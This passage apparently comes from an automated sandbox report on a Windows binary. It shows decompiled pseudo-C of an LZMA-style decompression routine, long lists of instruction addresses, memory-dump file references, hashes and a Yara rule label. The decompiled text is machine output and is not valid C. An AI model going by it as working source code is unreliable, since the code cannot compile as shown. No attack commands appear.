								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406786
0x0040678d
0x00406793
0x00406799
0x00000000
0x0040679d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067bf
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d4
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x0040681f
0x00406822
0x0040684a
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406824
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683c
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406893
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x00406898
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b5
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fb
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa3
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fd9
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407001
0x00407001
0x00407004
0x00407007
0x00407007
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406995
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x004071ab
0x004071b1
0x004071b3
0x004071ba
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
